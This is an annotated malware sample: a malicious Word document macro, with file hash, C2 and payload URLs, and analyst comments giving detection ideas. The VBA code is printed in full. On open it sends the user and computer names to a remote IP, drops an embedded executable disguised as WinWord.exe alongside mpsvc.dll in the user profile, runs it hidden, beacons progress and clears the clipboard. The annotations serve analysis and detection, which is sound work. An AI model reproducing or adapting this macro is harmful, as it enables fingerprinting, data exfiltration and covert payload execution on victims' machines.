- # Malicious Macro from - https://twitter.com/ClearskySec/status/1110941178231484417
- # Filehash: 67dafac37ca130af3f818ab927ad5bcc
- # Size: 18623
- # Filename: Timelines - ECRL.docx
- # Malurls
- # - http://167.99.72.82/main.dotm - Malicious DOCM
- # - http://195.12.50.168/D2_de2o@sp0/ - C2
- ' Module header lines as they appear in the extracted listing. "Option VBASupport 1"
- ' is normally seen in LibreOffice Basic renderings of VBA modules - presumably the
- ' macro was dumped with such a tool; confirm against the extraction method used.
- Rem Attribute VBA_ModuleType=VBADocumentModule
- Option VBASupport 1
- Option Explicit
- ' user32 clipboard imports, declared twice so the module compiles on both VBA7
- ' (PtrSafe) hosts and older VBA hosts. In this listing they are called only at the
- ' end of Document_Open, where the clipboard is opened, emptied and closed.
- ' Analyst note: direct Win32 Declare statements in a document module are a useful
- ' static triage signal, since ordinary document macros rarely need them.
- #If VBA7 Then
- Private Declare PtrSafe Function OpenClipboard Lib "user32" (ByVal hwnd As Long) As Long
- Private Declare PtrSafe Function EmptyClipboard Lib "user32" () As Long
- Private Declare PtrSafe Function CloseClipboard Lib "user32" () As Long
- #Else
- Private Declare Function OpenClipboard Lib "user32" (ByVal hwnd As Long) As Long
- Private Declare Function EmptyClipboard Lib "user32" () As Long
- Private Declare Function CloseClipboard Lib "user32" () As Long
- #End If
- ' Document_Open: auto-run handler; Word invokes it when the document is opened
- ' with macros enabled. Analyst summary of what the visible code does:
- '   1. Sends the local user name and computer name in an HTTP GET query string.
- '   2. Walks the document's shapes; for two named shapes it copies the shape and then
- '      copies a file of the same name from %TMP% to
- '      %LOCALAPPDATA%\Microsoft\Windows\WinWord.exe and ...\mpsvc.dll.
- '   3. Hides a third named shape and un-hides the document text.
- '   4. If both files were copied, starts the dropped WinWord.exe with a hidden window.
- '   5. Empties the clipboard.
- ' Detection ideas: WINWORD.EXE issuing outbound HTTP requests, a file named
- ' WinWord.exe created outside the Office install directory, and the Office process
- ' spawning a child from a user-writable path.
- Private Sub Document_Open()
- ' Every runtime error is swallowed, so a failed request or copy stays invisible to the user.
- On Error Resume Next
- Dim iShape As Shape
- Dim EmbeddedEXEFileName As String
- Dim EmbeddedDllFileName As String
- Dim OutPutEXEName As String
- Dim OutPutDllName As String
- Dim DLLReleased As Boolean
- Dim EXEReleased As Boolean
- Dim sHostName As String
- Dim sUserName As String
- Dim myurl As String
- Dim MyRequest As Object
- ' Late-bound WinHTTP COM object, so the HTTP traffic originates from the Office process itself.
- Set MyRequest = CreateObject("WinHttp.WinHttpRequest.5.1")
- ' Host fingerprint taken from environment variables.
- sHostName = Environ$("computername")
- sUserName = Environ$("username")
- ' Check-in URL carrying u=<username> and h=<computername>.
- ' NOTE(review): the host literal here starts with "1167", which is not a valid IPv4
- ' octet and differs from the 167.99.72.82 address given in the paste header. As
- ' written the request would presumably fail (silently, because of On Error Resume
- ' Next), so hunt on both strings and do not treat a missing beacon as proof the
- ' macro did not run.
- myurl = "http://1167.99.72.82/index.html?u=" + sUserName + "&h=" + sHostName
- MyRequest.Open "GET", _
- myurl
- MyRequest.Send
- ' Shape names used to locate the embedded payload objects inside the document.
- EmbeddedEXEFileName = "189acd0ce3b06b9193ce"
- EmbeddedDllFileName = "663f2fe952b29a8d14f5"
- ' Drop locations under the user profile. The EXE reuses the name of the Word binary.
- ' NOTE(review): an EXE and a DLL written side by side is consistent with DLL
- ' side-loading - confirm by analysing the two dropped files.
- OutPutEXEName = Environ("localappdata") + "\Microsoft\Windows\WinWord.exe"
- OutPutDllName = Environ("localappdata") + "\Microsoft\Windows\mpsvc.dll"
- DLLReleased = False
- EXEReleased = False
- For Each iShape In ActiveDocument.Shapes
- If iShape.Name = EmbeddedEXEFileName Then
- ' Select and copy the shape, then copy %TMP%\<shape name> to the EXE drop path.
- ' Presumably copying the embedded object is what makes Word materialise the file
- ' in %TMP%; the code itself only shows the FileCopy from that path - verify in a sandbox.
- iShape.Select
- Selection.Copy
- FileCopy Environ("TMP") & "\" & EmbeddedEXEFileName, OutPutEXEName
- ' Set unconditionally: with errors suppressed, the flag does not prove the copy succeeded.
- EXEReleased = True
- ' Progress beacon: a=exe.
- myurl = "http://1167.99.72.82/index.html?a=exe"
- MyRequest.Open "GET", _
- myurl
- MyRequest.Send
- ElseIf iShape.Name = EmbeddedDllFileName Then
- ' Same copy sequence for the DLL.
- iShape.Select
- Selection.Copy
- FileCopy Environ("TMP") & "\" & EmbeddedDllFileName, OutPutDllName
- DLLReleased = True
- ' myurl is not reassigned in this branch, so this request repeats whatever URL was
- ' set last (the initial check-in or a=exe, depending on shape order).
- MyRequest.Open "GET", _
- myurl
- MyRequest.Send
- ElseIf iShape.Name = "4862e6f290cff1334b77" Then
- ' Third named shape is hidden and the document text is un-hidden - presumably a
- ' lure overlay that is swapped for the real content once macros run.
- 'MsgBox "Show Normal Content -> " & iShape.Name
- iShape.Visible = msoFalse
- ActiveDocument.Content.Font.Hidden = False
- End If
- Next iShape
- ' Execution is gated on both copy steps having been attempted.
- If DLLReleased = True And EXEReleased = True Then
- ' Launches the dropped EXE with a hidden window; it appears as a child process of Word.
- Shell OutPutEXEName, vbHide
- ' Progress beacon: a=run.
- myurl = "http://1167.99.72.82/index.html?a=run"
- MyRequest.Open "GET", _
- myurl
- MyRequest.Send
- End If
- ' Clears the clipboard, removing the object data left behind by Selection.Copy.
- OpenClipboard (0&)
- EmptyClipboard
- CloseClipboard
- End Sub